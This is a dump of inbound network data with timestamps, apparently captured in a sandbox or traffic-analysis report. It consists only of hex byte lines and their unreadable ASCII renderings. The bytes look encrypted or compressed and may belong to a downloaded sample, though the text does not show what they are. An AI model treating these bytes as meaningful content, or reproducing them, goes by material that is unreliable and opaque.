                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1711INData Raw: 04 5d ce af f7 75 4e ec fd c9 f6 f7 14 bb 9d 6c 17 d6 ca 12 ca 29 f5 7a 62 6b f6 6c f7 96 b4 e2 33 1a 9a 18 55 98 31 c3 f3 13 36 ab 01 cd 44 a7 44 98 14 31 de b3 14 a8 4d bf 14 54 2f 21 1a d5 19 bf e7 fa f1 4e 49 75 64 e8 9d 12 06 f7 e0 98 30 89 4a c2 ee d8 85 29 59 cf 13 8f 89 d4 ca 5b ce a2 78 eb 3f bd a2 d2 fe b2 32 82 ee 21 df fd d3 b7 49 71 e3 0b 21 da d7 34 46 c9 15 ef d7 51 48 6b 2b cb ff c5 47 92 c7 fb 29 6c 61 e6 4a ce 5f c1 d2 26 cb 31 d9 d2 51 6d a5 5c db a6 c1 49 75 9c 29 46 87 6b 31 7f 45 80 2f 74 83 25 5d c2 19 22 c6 c3 80 5e 05 71 0d 66 13 53 47 6b 28 d7 ec af 54 eb 71 d6 e4 d3 c2 1a 39 09 fb 75 1a 12 8a ae a6 95 9c d3 12 db b9 fb 2c ae 33 7d 3e e1 7f 29 68 7e 34 15 fa c5 cb aa c2 6f c6 7d 94 99 95 d1 ad 49 29 72 ff ba e6 dc 0e 51 05 78 c7
                                                                                                                                                                                                  Data Ascii: ]uNl)zbkl3U16DD1MT/!NIud0J)Y[x?2!Iq!4FQHk+G)laJ_&1Qm\Iu)Fk1E/t%]"^qfSGk(Tq9u,3}>)h~4o}I)rQx
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1727INData Raw: 09 5e ef 55 16 4a d3 8c bb c9 b0 2a f7 bb 29 c2 46 27 b2 9f f5 d3 1d 4c 3a 34 12 c0 9c 20 ba f2 f7 89 44 59 cd 60 c7 31 16 29 4e db fb 36 da 68 9b 26 4f e9 f3 77 c5 76 25 d8 07 2a 30 ba 67 b3 76 12 ca b6 01 78 a9 23 eb 52 56 c2 6c 72 45 7b 2f fc 1f c9 09 89 7a 7d db f4 9e fa 92 f2 aa f3 35 c2 07 ff e6 d5 1f b0 ad b9 2e 2b ea 5f be cf 2d 31 1a 96 d9 09 90 9d ff 74 5c 7e 7a 71 a8 52 5d b3 22 cc eb 39 a1 2d 36 8f 09 56 e8 cc a0 c9 be 99 4b 52 b3 d1 88 20 e1 eb 57 1e 21 4a 6c 86 a3 31 ec eb 39 54 2a bf 68 2a 71 41 e2 89 0e c3 1a 7e c9 4e 40 3f 39 1f b1 05 ac 4f 34 28 0e 6c e3 5f 96 dc 41 c7 8c 4f 3f 29 a0 2a 0e a3 92 a5 17 4a 74 b0 ba 3c 68 33 9e 9e 54 5e 1f ce 93 01 7d 49 34 57 92 b6 21 34 ec 91 1a 2d c4 0e 60 20 6f 97 05 6d d0 5d 1b 8a 00 88 75 0c e9 66 0e
                                                                                                                                                                                                  Data Ascii: ^UJ*)F'L:4 DY`1)N6h&Owv%*0gvx#RVlrE{/z}5.+_-1t\~zqR]"9-6VKR W!Jl19T*h*qA~N@?9O4(l_AO?)*Jt<h3T^}I4W!4-` om]uf
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1743INData Raw: 33 92 19 31 09 0f d0 d5 f1 38 19 2b 1d b8 3a fe 29 4a 04 91 00 49 29 f8 31 16 0d 54 28 5a 2d a6 c4 53 c6 a7 01 26 34 7b cf 2c 0d 73 77 15 e7 20 1e 58 e1 58 79 69 3a 19 da ef 84 0b 80 01 c3 af 92 57 a0 5f fc 47 48 3b 40 c2 b4 7e 72 98 df 2c e3 40 ac 52 5f 7e a1 c2 25 28 5c 84 69 dd 71 4d e9 02 30 09 c3 5d c6 55 5a b9 32 d9 37 e6 2b 48 29 d7 0b e8 31 ff 18 9e 2b 30 99 d1 bf 27 cb 77 6c 0f ec f1 b1 fb 92 e9 c4 05 a7 1a 1b 29 31 5e 92 c3 42 1b 16 97 ec 30 fd 60 88 4e 9d 57 b9 c2 31 04 82 36 df cc 6b 95 72 c9 4c f7 8e 92 04 8b f6 5f 0a ee 25 c5 ba 19 78 3a 3f 3a ba 23 6f 31 b6 3e 16 f7 c8 5d 12 fb 32 09 c2 51 89 a5 92 24 02 b2 89 da e6 0c ee f0 98 b1 85 cc 14 f3 fa cb e3 9a 07 6c 9d 47 eb 3b cb dc ba b1 bb 0a 59 e2 a7 e8 55 c4 02 9f 55 06 92 10 53 ba eb 4c f7
                                                                                                                                                                                                  Data Ascii: 318+:)JI)1T(Z-S&4{,sw XXyi:W_GH;@~r,@R_~%(\iqM0]UZ27+H)1+0'wl)1^B0`NW16krL_%x:?:#o1>]2Q$lG;YUUSL
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1759INData Raw: 7d a5 9f 22 52 0d de 25 35 18 a7 3e 89 79 ce 48 db 0a a5 be 82 b3 e8 58 cc bf 30 39 21 d1 95 56 51 49 75 85 f3 e8 e8 d5 d7 a3 96 7d 94 8b 42 31 cb 71 6c 03 09 f2 81 20 c8 4f a4 6f bf 78 95 95 1c 25 fc e3 9c b2 64 3a 50 95 4f b1 60 76 77 5b b9 4a d3 65 24 b8 40 04 73 08 01 d6 c9 46 05 29 ec b0 2f ce 9a d9 41 33 f6 2c c2 c2 f2 be 2f 6a 25 53 47 13 1c 65 4e aa 98 c9 89 5b f8 a1 eb 3f a1 be 22 a9 da 8e dc b8 c9 5d ab cd 5c ce e8 51 a6 6d b2 56 c6 73 ae 94 3a f2 4b b3 3b 2f 08 46 15 25 ee 28 53 f8 a6 8c af ce 6a 9f c4 cc 55 ea 4f 2a f8 0a 8b cb fb 34 2d dc da 72 f7 6e 95 b5 29 cf 7f 0b 4a f8 68 96 fe 52 f9 6e 03 21 cf 03 30 0b 44 d3 a0 8f e6 6b 35 29 c7 48 11 e0 23 8c 31 36 c7 4e 40 e3 4c c5 31 f2 d9 90 d1 f1 7f a6 aa 4e 24 4d fb 24 8b fc 3a c8 c3 49 ff 89 6e
                                                                                                                                                                                                  Data Ascii: }"R%5>yHX09!VQIu}B1ql Oox%d:PO`vw[Je$@sF)/A3,/j%SGeN[?"]\QmVs:K;/F%(SjUO*4-rn)JhRn!0Dk5)H#16N@L1N$M$:In
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1775INData Raw: e8 4a b8 d0 25 8b 38 7f 6f 35 92 02 b3 b2 81 e7 87 22 91 2a d8 1a cb bf 5e e5 46 d2 14 60 18 1d 48 d5 c6 97 03 4a d1 b4 92 66 cd 3e 96 c8 01 2c 44 36 ba 64 a4 3e be 31 41 f3 34 dc cd 60 84 60 46 39 6b 54 9e 93 96 d7 16 f7 aa 9d e6 6b ec 5c 13 31 ce fb 9e 76 0b 13 01 c7 fb bc 16 eb b3 74 25 25 57 65 84 ad f9 64 25 d7 e2 17 5b ce 0a c3 50 10 95 2d 0d 2d cf fb e3 15 c7 3e 29 f0 33 19 21 5a e8 36 fa 5c 22 d7 8c 64 28 1c 9c b7 e6 24 06 24 8d c9 57 1b 3d f0 ff 66 01 9f 74 b5 c9 55 73 ac a7 ff 96 c7 5f ca c2 20 f9 53 c3 93 06 a1 6f 89 3e f7 28 c5 24 13 bf b2 0d c4 2b 06 f7 9a 4d ed 93 e8 8d c2 33 06 bf af 4d aa 20 5b a5 19 5c cb 38 87 b4 cc bf 09 77 d9 bd ce ed b9 b2 0b 21 f9 b2 ba 7c 1b 4f af d1 a7 06 5d 33 05 27 4e bd c5 fa ca b9 4e 8c 34 c6 45 98 2f c4 29 9c
                                                                                                                                                                                                  Data Ascii: J%8o5"*^F`HJf>,D6d>1A4``F9kTk\1vt%%Wed%[P-->)3!Z6\"d($$W=ftUs_ So>($+M3M [\8w!|O]3'NN4E/)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1791INData Raw: 28 c7 01 97 db d3 44 30 ee a9 e9 f4 ea bc 11 fc 06 e1 c2 34 7c 33 b5 56 d5 d8 01 08 85 ae 4f e9 ff 04 3c 94 a6 50 02 c1 72 0b 85 46 7f 59 9d 67 b9 0b 1f 9b 2d de 49 72 7d cc 31 7a 2b 91 ce 64 0b a2 b7 de 84 1c cb 2e eb b6 ba 17 31 08 6d 2b e8 83 ce 94 ae ea 66 27 74 fa 62 5f f4 7d 5c 5b c9 d5 5b 84 79 d3 c0 b3 ba b9 e6 43 20 19 69 be 18 7f 3a 31 dd ed 22 27 5f e5 22 90 33 02 f1 6c 88 dd 7d b2 10 5f f1 3d c4 10 ef 9f 2d 78 4b 07 fa 8e f3 48 d6 0b 6f 05 03 7d e8 bf 10 18 18 3b 22 7d 19 5b 76 c4 14 35 8b c8 f6 5d 63 0d 3c b4 e8 1e d8 07 a5 8b 79 9d c0 f3 4a 95 f8 ca 02 01 e2 0b e5 9e 91 c8 20 d7 2a 00 89 43 e1 f5 58 2d af 3e 3d eb a6 3b 44 80 7b 8f fa ff 6c d6 fe 03 d3 52 fd d1 59 0c 00 79 4a d5 20 3a 84 f2 03 2d a5 1c 5e 84 20 4c e0 e7 80 ee 4e 98 cb 00 36
                                                                                                                                                                                                  Data Ascii: (D04|3VO<PrFYg-Ir}1z+d.1m+f'tb_}\[[yC i:1"'_"3l}_=-xKHo};"}[v5]c<yJ *CX->=;D{lRYyJ :-^ LN6
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1807INData Raw: bf f1 a3 eb 75 b6 87 bf d9 9a e9 ff 3a 5b f5 61 1d 09 3b 38 7a e9 30 0d d0 0a f3 fc 50 b1 01 37 aa 39 61 32 39 de d7 41 47 9c f1 89 e2 5d 67 0d 7a e2 c6 d7 4f ca 20 b2 99 47 48 b2 27 e5 80 1c c3 2d db 7c c0 c3 64 66 d8 4b 18 b8 23 b4 ef 3c 90 3a bf 51 65 52 5f 5e 5d 71 e7 40 4a 96 30 07 00 77 2c 61 0e ee ba 51 09 0f 99 19 c4 6d a0 8f f4 6a 70 35 00 a5 63 e9 a3 95 64 9e 32 00 88 db 0e a4 b8 dc 79 1e fc d5 7b e0 00 d9 d2 97 2b 4c b6 09 bd 00 7c b1 7e 07 2d b8 e7 91 03 1d bf 90 64 10 b7 b0 f2 20 b0 00 6a 48 71 b9 f3 de 41 be 02 84 7d d4 da 1a eb 60 33 6d 51 79 b5 00 f4 c7 85 d3 83 56 98 6c 00 13 c0 a8 6b 64 7a f9 62 00 fd ec c9 65 8a 4f 5c 01 07 14 d9 6c 06 63 10 3d 0f fa f5 00 0d 08 8d c8 20 6e 3b 5e 00 10 69 4c e4 41 60 d5 72 0f 71 67 a2 d1 37 00 ce 47 d4
                                                                                                                                                                                                  Data Ascii: u:[a;8z0P79a29AG]gzO GH'-|dfK#<:QeR_^]q@J0w,aQmjp5cd2y{+L|~-d jHqA}`3mQyVlkdzbeO\lc= n;^iLA`rqg7G
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1823INData Raw: c9 00 0b 9f 83 e8 04 e9 24 a9 d3 92 0f 5e 07 04 bd 28 ab 12 6b a3 45 87 88 19 0e 10 89 aa 45 4c 08 78 23 01 c4 ff 80 b4 f9 d1 5b 2a ca 87 10 0c 22 48 ce 13 3b ab ee 8e ba 2b 29 9b e2 30 cd 34 11 ed 1b f4 b1 30 db 00 a1 39 e7 92 db 20 34 79 79 0d e6 67 9f 03 af d5 66 9c 80 db 0c 5b 02 6a 47 94 89 04 13 55 f7 b8 1d 00 e3 56 fb 2a 5d c8 e5 7f 20 79 95 48 22 77 5d ac 10 a2 dd 21 b3 9f 86 d4 02 62 b1 2c 4d 2a e6 a7 f0 46 fc 03 85 63 18 6f 15 8c 6a de f8 82 a0 19 08 19 db 3a ca fb 21 97 89 f9 9c fe cb 88 e3 f6 42 c3 a0 01 72 a8 02 01 a4 3f 3b 82 cb d1 66 1f 44 56 9c 60 d6 b8 74 63 84 b0 25 c9 48 e8 0f 2b 90 44 01 6a 48 15 30 01 a1 bf 50 ec 96 ef af 48 5d 90 79 0d a5 ec 75 4f 02 b8 b4 a0 72 c1 2c 24 29 f5 4c 00 ca e3 9e a4 55 e2 e0 98 eb b2 34 0c 9c 2f a3 e9 f6
                                                                                                                                                                                                  Data Ascii: $^(kEELx#[*"H;+)0409 4yygf[jGUV*] yH"w]!b,M*Fcoj:!Br?;fDV`tc%H+DjH0PH]yuOr,$)LU4/
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1839INData Raw: e8 8a b0 bb dd 56 01 77 b6 d5 44 57 e7 a0 d0 30 09 1d fa 34 15 01 fc 61 67 e9 ee 68 18 75 16 ae 58 0d a8 79 82 d6 be 1b df d9 80 02 d0 c2 fe ff 82 11 54 f1 ff 90 b4 db 6b 30 c6 2f 1c ca 48 12 be 18 04 f6 32 bf bf 05 ee 7a 5d bf b0 6d dd 88 fa 35 27 80 af ff 96 99 72 ec 9d f3 a4 70 93 cf e1 c2 15 00 93 e1 dd d1 d9 da bd 95 9e 97 32 ff 8e 45 4e 22 e5 33 14 71 31 87 02 28 4f 1b 66 51 ab e4 92 ea 70 22 71 16 f6 5f 58 f2 ae c4 33 b9 af 3b 39 27 0f 67 e6 91 24 2d 33 d7 17 79 01 2e b7 68 aa 56 7c 0c b2 0a 57 1c d7 97 14 2d ee f2 27 1e 7b 7f 6a 4f de 6c 12 12 eb ce 4b 4f ca b0 89 3a dd 51 79 96 10 2e a7 23 04 59 0b 0a 09 5a 89 10 5f f3 2e 49 09 30 5b f8 eb df c7 22 b0 26 f3 cb 60 4b 04 f8 1b b8 f1 97 5e 3e 5e 9f 57 1d 0f a5 c6 fd 4b 39 b8 c1 e4 f7 4f 4a bb 29 b1
                                                                                                                                                                                                  Data Ascii: VwDW04aghuXyTk0/H2z]m5'rp2EN"3q1(OfQp"q_X3;9'g$-3y.hV|W-'{jOlKO:Qy.#YZ_.I0["&`K^>^WK9OJ)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1855INData Raw: 17 b2 19 cb 07 75 34 2c f4 ac 51 49 83 2b b5 e1 2a b2 7a 9b 28 d1 38 49 7e ad 86 e5 aa f2 af d7 ee 6b 67 16 89 ee bb 7d cb 6b f7 09 5a f1 c3 2b f8 01 b0 4e bf 63 52 31 cc 85 09 0a ba 8f 04 2d 06 fe 2a 54 bd 7c df e0 01 33 ff e0 bb 96 2d 71 3a eb 3a 94 ff 71 dc 6b 5e 18 87 55 bd 51 22 57 14 75 5b 71 09 5b 56 d3 db eb 29 d8 5d 5b bb 69 7f a2 98 86 69 89 98 d7 4d e8 13 4d a6 58 4e ba 2c bb 2e 00 6d f9 2d 0d 2c 18 df 3f 77 48 2e 29 7d f2 ac 34 16 d7 a8 6f 34 c6 3e 13 08 ae 90 d2 68 c8 8d 30 63 79 e5 56 be 21 12 a6 af 0a ea a7 84 4b 89 e4 7e df 13 5e 2d b5 2f a9 e4 4e ab 79 a1 7f ac c4 b3 75 dc 46 60 ea 2e 0d e2 9c 08 32 3d 6b 0f f3 51 25 bf 4c fa 5e ee d3 99 05 b8 6e 8a 80 fc b7 62 8d 95 40 b2 b2 f5 20 4a f0 12 35 a2 2d a8 ee 8d d8 6f 3a a3 27 12 f7 56 00 68
                                                                                                                                                                                                  Data Ascii: u4,QI+*z(8I~kg}kZ+NcR1-*T|3-q::qk^UQ"Wu[q[V)][iiMMXN,.m-,?wH.)}4o4>h0cyV!K~^-/NyuF`.2=kQ%L^nb@ J5-o:'Vh
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1871INData Raw: 07 12 65 3a d5 ff 61 6e f3 7c dc bd 60 86 4c da 6b 1c d2 5e fa 01 26 5f 34 53 74 28 7b 8c d3 73 e2 6e 14 23 ad 6b df 0c dd b9 06 be d5 00 16 37 26 07 e2 a4 62 14 b5 00 9b e5 ac c3 0a 3e 51 74 09 3b 37 06 77 db b0 84 17 0f 01 d1 84 d6 77 3c 44 7c 2a 0b e1 8f 70 d5 bf e0 94 19 a5 54 13 18 32 a9 87 fb 8b 30 6e f6 f5 4e 0d 11 c9 ac 02 5b 34 60 e2 2e c2 0c 55 df 55 d3 a1 5b c5 ef c4 28 6a 1e 13 ef c5 db 88 11 be 18 a1 9a 44 5a 1e 22 83 90 da 30 d5 10 2c 23 8c d8 50 d9 f0 29 4b 21 ea 33 7d ad c8 2b de f5 be 6c 00 d7 2c 78 84 72 f9 1e 58 71 b4 e7 84 48 1e 87 67 90 f8 a6 1c 18 5f ad 23 bc fa d4 05 58 f5 01 8c 34 a3 ec f0 2f e0 6d 4a 31 9c 15 18 33 4d 91 28 38 04 b9 64 8f 39 fa a3 79 8e 21 1a 28 77 f8 79 01 58 95 4c f8 63 93 4e 38 e6 4e b2 7b e2 30 75 fc 28 5a f5
                                                                                                                                                                                                  Data Ascii: e:an|`Lk^&_4St({sn#k7&b>Qt;7ww<D|*pT20nN[4`.UU[(jDZ"0,#P)K!3}+l,xrXqHg_#X4/mJ13M(8d9y!(wyXLcN8N{0u(Z
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1887INData Raw: bf 60 01 c3 34 06 5e bf 3d 29 cb 1c 83 08 41 1c 14 2b fe 71 be 29 d3 a0 22 2b 18 e9 5c 65 74 28 7d 12 21 2f 6a aa 08 db eb 0d cd 87 da 20 76 c6 6a b1 44 d0 07 a2 73 f9 4c 24 03 c6 bc 5c c6 2a be 0d 87 e0 12 4e 6c 14 f7 f0 8a f5 8c 28 d2 c3 46 b9 2f bb 9e 83 e3 ea c9 04 28 b3 f9 6c 4e 88 a2 e1 02 59 02 80 83 fb 34 55 d2 ff c6 48 e2 cc 34 00 70 a5 c4 f5 1c 18 55 b0 32 79 4a 3e d2 68 7c 92 98 ce 10 73 c5 5e c8 80 51 6c a4 f4 b8 74 15 86 34 e9 c8 80 e3 f9 44 4e cf f4 b6 10 9d fc ff 04 66 06 d7 ba ab a2 e7 9e 93 cb 0f 40 4a 8e 36 6b 42 0f b9 93 ba b2 7c 09 b0 51 05 df 59 7c 8d b4 92 9c 8c 06 93 7b 80 1a 54 74 d5 4d 33 76 9a 20 34 b1 8d 94 40 06 36 cd 0c 1a 6c b0 50 2c 80 3c ec 77 83 f2 09 1d a7 92 30 df c0 3a 22 bb 00 c1 f1 e3 1a 2a b8 6c 6d 0c e5 ce 8e 29 24
                                                                                                                                                                                                  Data Ascii: `4^=)A+q)"+\et(}!/j vjDsL$\*Nl(F/(lNY4UH4pU2yJ>h|s^Qlt4DNf@J6kB|QY|{TtM3v 4@6lP,<w0:"*lm)$
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1903INData Raw: 45 ec 19 f1 52 a7 af 5e 48 19 55 e9 25 14 4e d2 34 20 ca 71 00 5b d8 21 ad e0 3d c7 ee fd 3b ef 21 6e 1c c4 30 b7 30 07 7d 85 2e 66 dc f3 10 87 2f 1e 97 62 12 59 f3 6c 84 83 2f ad ff 5c 6e 42 9c 88 e8 a0 95 ae 16 b3 50 fd 05 ce 53 98 00 0c 6a f6 68 ef 5f 2d 31 5e dc e7 70 20 db c0 fe 67 9d b5 0d f5 a8 df 12 22 33 3c 32 4c b9 bc be 90 7a 16 03 2b 50 58 bb a8 61 18 f8 8a 53 06 9a ac 4d 72 11 f9 fa 74 32 0b 15 a5 a0 59 a2 13 96 e8 bf 05 98 94 19 81 b0 7d 66 41 4a e1 30 8c f0 fa f4 98 3b 08 a5 19 0d dd 83 fb 22 8e da f4 44 6c 60 86 39 98 e2 58 0a 1a 2d d1 e5 28 05 d4 5a 7b 85 48 c0 82 30 e0 58 54 ae b4 4b 86 4e 4d bc e4 c0 72 65 3a 39 11 10 3d 6b 37 90 ac 0a 0d 6d 52 b8 89 f8 13 f1 08 2a 32 7c e5 62 d4 71 29 4d 40 d8 77 6f c1 58 66 78 0c d1 30 cf 62 4f 9c 8c
                                                                                                                                                                                                  Data Ascii: ER^HU%N4 q[!=;!n00}.f/bYl/\nBPSjh_-1^p g"3<2Lz+PXaSMrt2Y}fAJ0;"Dl`9X-(Z{H0XTKNMre:9=k7mR*2|bq)M@woXfx0bO
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1919INData Raw: 22 80 47 85 5d d4 65 2f de 0d f1 1c 7a d8 be 5e a6 94 f6 6f 16 73 f1 5f e5 57 17 9d c1 46 10 2b 6a d9 10 6b 75 d1 e0 28 48 12 1c 3d 29 af f2 1d d3 fb c8 a5 9f 18 44 d8 64 17 57 bf 0b 0b 23 c5 1b 7f bc bc d9 a6 1a 6c af 3b 76 0e 5e 95 d1 03 d4 95 62 07 7d db 2a 64 87 0b 5c 77 6f 83 42 41 b4 c0 89 7d d5 99 df 38 12 7b 03 ae 1d f5 50 fc 80 f6 89 41 f2 07 7d a5 e9 72 33 1a 1f 94 0c 80 17 93 ca d7 33 5c 02 37 c4 af 73 88 b3 df 5d fa 89 81 81 e9 42 9f dd 76 47 d4 77 e8 d3 1d 4f e8 e7 98 ff 30 f7 6f 0f ae 73 9f 4c 6a bd 0c 19 1e 75 18 f7 09 d0 78 f1 0f 79 3e 1f 45 c2 fa 67 29 d1 c2 03 29 08 54 c1 83 4f 06 fb 57 41 2e 40 f9 69 6e c0 ca f2 27 05 cb f7 1e 20 66 ef 5a a3 cd 9c 4e 95 04 93 0b 1d a5 0c 7f 66 2a 44 19 f8 9e 8a 2d d6 ed ad 5f 3c 89 4f 28 04 fc 26 f1 e9
                                                                                                                                                                                                  Data Ascii: "G]e/z^os_WF+jku(H=)DdW#l;v^b}*d\woBA}8{PA}r33\7s]BvGwO0osLjuxy>Eg))TOWA.@in' fZNf*D-_<O(&
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1935INData Raw: b4 4e d3 00 9d c5 3c 58 35 aa 4b ab 75 5e 1f 86 29 91 6d dd 03 de 95 82 15 46 7a a6 b8 31 4d bc f2 2b 24 26 ba 00 82 a5 a1 89 c7 99 fc ff 09 84 4d 24 74 75 d0 b7 4f de e8 44 a2 9e 19 3a da 02 58 d9 80 a0 4a 97 44 89 4f c4 b8 5c 35 38 19 03 78 c6 39 02 e0 19 a5 4b 9f fc 56 89 bd 12 7f a3 37 f7 18 01 88 1e 44 65 57 42 e0 47 46 45 3a 97 07 60 08 b9 f8 65 39 cf 12 12 e0 de ff f5 de f8 18 21 30 45 ce f9 7d 53 50 9d 53 b3 4f c0 b8 e1 2e c2 76 1d 48 35 8a 49 5b 5a f5 43 bf c8 b4 c6 9e 4e c9 af 8c 0e e9 24 43 7e 4d 9f c1 8e 82 5f 20 53 68 9c 54 fb 24 5d 5b a7 62 87 c7 89 c6 ff a8 64 08 34 0c 1a 18 0c 0f 24 65 20 b2 05 9e 41 88 ea 91 c9 26 c8 e0 f2 ec 18 e6 84 6f 19 d7 95 b7 d8 b6 01 e3 58 df 4f 08 ef 80 32 c2 1e d7 10 4a f1 34 09 02 ec 09 ea 8f 83 ba 2c ca 09 68
                                                                                                                                                                                                  Data Ascii: N<X5Ku^)mFz1M+$&M$tuOD:XJDO\58x9KV7DeWBGFE:`e9!0E}SPSO.vH5I[ZCN$C~M_ ShT$][bd4$e A&oXO2J4,h
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1951INData Raw: c6 40 92 06 40 5f ea 07 8a ac 64 e0 c0 91 66 ee 54 8c 18 07 31 3c 84 5e 19 a3 f2 16 3e bf f9 64 24 2c 53 0e 85 09 04 44 b5 e4 1c 32 5e 34 b0 5e e5 2f f0 e4 da d6 45 ec 60 6f df 4e 6b a7 ac 29 63 fc 8d 7c 24 14 d0 5d 95 15 5f ea 59 84 00 d7 ca 78 82 71 05 a7 37 7e 9b 18 f0 2a e0 b7 6c 12 f7 48 8e e3 3a 0c e9 dc 2c b2 32 92 72 17 70 98 ca f7 8c 04 3a 16 3c 20 02 1e 68 03 20 15 0b 49 e9 37 c8 4c 6d 63 88 da 01 d8 17 95 39 d2 3d 44 7a 85 d6 85 08 be a3 c4 d6 61 18 51 50 2b d0 24 ee 10 2b b7 bc bd b7 7e 27 f9 2c d3 05 51 5b e4 64 73 ae a3 1d 58 29 4b ee 9e 78 4b e8 ae f2 51 75 56 44 fa f7 53 ab 53 5f 3b f3 9e a9 3e ab 39 f9 2e af 68 fa dd 4c 99 d3 27 25 7e 27 44 0b d1 2d a7 49 00 a2 d9 28 58 94 ab 09 9f 4c 08 20 f5 55 e9 41 44 7c f1 4f bd af de 04 17 cd fe 0b
                                                                                                                                                                                                  Data Ascii: @@_dfT1<^>d$,SD2^4^/E`oNk)c|$]_Yxq7~*lH:,2rp:< h I7Lmc9=DzaQP+$+~',Q[dsX)KxKQuVDSS_;>9.hL'%~'D-I(XL UAD|O
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1967INData Raw: 52 d6 d4 27 62 67 d5 e7 64 02 03 70 f8 ff 09 69 d4 e7 3f f0 54 6e 13 43 4a 42 ab 88 3f f8 0a 9b e0 c6 37 f9 3e 01 f4 90 74 c8 89 76 6f e4 fe e7 1f 88 44 07 81 70 0f 84 f6 32 60 4e e9 37 51 79 5a b0 82 af 2a f5 f7 33 fa 0f 80 3e 7a 07 e0 db cf b9 10 2e e1 e3 10 6d e5 41 06 2f f3 f7 7b e6 98 7d d0 30 98 cc a0 f6 8f 81 63 50 88 e9 0d 2d 57 5f 5e 8d e4 10 fd 47 12 8b 3c b8 d0 93 a6 64 27 fd 59 34 3e 89 82 34 b5 8e b2 8b 24 5d e5 5a e4 5c ea 2d c8 3a da 52 93 ab e2 2f a5 ae e1 71 3f e6 33 d7 ee dd 6d 7b fd 8d 0b 62 e8 2d 57 19 43 8b f6 57 d9 43 5a 75 56 6d 7a 10 22 e9 42 a9 a9 51 3f bc 44 81 32 d6 d9 28 3a ca 67 4a f1 03 3f bc 0a f2 51 76 43 64 52 80 c9 d1 ff 1c 00 f7 d2 4a c1 ea 06 81 f2 70 bf 27 8c 03 c2 73 d7 79 5c e7 e9 2d a5 d5 08 2f 02 71 50 c1 f3 d8 43
                                                                                                                                                                                                  Data Ascii: R'bgdpi?TnCJB?7>tvoDp2`N7QyZ*3>z.mA/{}0cP-W_^G<d'Y4>4$]Z\-:R/q?3m{b-WCWCZuVmz"BQ?D2(:gJ?QvCdRJp'sy\-/qPC
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1983INData Raw: cd 5a 24 e3 08 11 c5 21 25 e8 f6 78 49 ec f0 82 cc 56 d8 25 56 80 d8 87 72 52 0a 9c 17 31 39 c1 08 a4 a9 20 b3 3b ba 98 04 78 40 eb b9 48 aa 21 20 ee c8 20 a4 8c 4b c5 8d 1c 68 24 40 d0 ce 41 ac 02 dc fd 7d 17 78 2f 0b c0 f6 00 84 28 74 ca ec 00 ed 28 70 02 74 3f 86 89 21 e3 20 e2 62 41 40 b6 e0 41 12 e0 fa 33 74 51 a0 aa b1 8e 5d d7 e0 44 2c ea 80 ae 25 4b 1c f4 c4 b4 a8 fc 3f 21 99 c0 3e 18 8a bb 19 f7 9f 04 fd 76 db 72 40 92 d0 5f 70 a4 97 72 24 ed 7e cb 30 5b 70 60 12 73 81 bc c0 6b 6f 60 11 32 b2 13 2b dc 94 72 2b f4 43 0c a3 24 a0 53 10 af 2c ed 5c 04 08 ef 29 49 60 18 0f f9 17 12 5f 2d bc c0 a2 38 25 f8 fa 39 b4 7c 54 1f f1 ae 00 1e 0e 74 3a eb 91 bd c0 98 a9 45 95 79 1c 32 48 2b 53 ec 22 30 94 b4 10 30 cb 55 dc e0 2d bd c4 10 ce a8 32 bc b0 c2 cc
                                                                                                                                                                                                  Data Ascii: Z$!%xIV%VrR19 ;x@H! Kh$@A}x/(t(pt?! bA@A3tQ]D,%K?!>vr@_pr$~0[p`sko`2+r+C$S,\)I`_-8%9|Tt:Ey2H+S"00U-2
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1999INData Raw: 0d 19 ab 46 2f a9 16 61 76 50 04 84 11 36 b4 4c 7e 00 a5 e1 7b 32 3c 6c fb 16 00 96 fe 88 99 97 ef 6d c6 26 7c 72 b0 14 71 20 10 2f 41 03 d4 18 43 fd 5e d0 28 32 44 14 8c 1b 4e 14 14 dd 35 34 48 94 04 ac 9c 49 ec be 00 24 73 39 5a 15 ab 04 36 df a6 e0 b8 be 40 0c eb 49 e4 72 50 64 9e c0 e7 be 13 c4 e1 f8 23 44 22 91 f8 f8 64 7b 18 b0 08 77 8a bc ce d0 60 da 12 41 7e ce 10 be e4 49 09 dc 6c 69 88 90 0f 55 2c 28 d6 10 ae 28 e9 0c 40 45 6e f4 3a 0d c8 18 db 11 54 0a da 4f 0c 34 64 35 3c 1b 8b e1 08 98 52 18 1d 1e 43 03 c8 05 78 eb be 87 1f ed 21 c4 d3 3c d5 87 91 bb 0a bc 24 2e 94 ee 7f 21 c5 c0 05 0c 33 79 48 18 c2 79 a8 0f 21 aa 63 75 30 99 39 11 4c c0 94 52 5f 5c 78 52 49 70 78 f9 4c 10 39 10 86 7f 72 8f 3f 0f 80 10 81 29 bc fe 31 55 78 82 89 af 91 44 ec
                                                                                                                                                                                                  Data Ascii: F/avP6L~{2<lm&|rq /AC^(2DN54HI$s9Z6@IrPd#D"d{w`A~IliU,((@En:TO4d5<RCx!<$.!3yHy!cu09LR_\xRIpxL9r?)1UxD
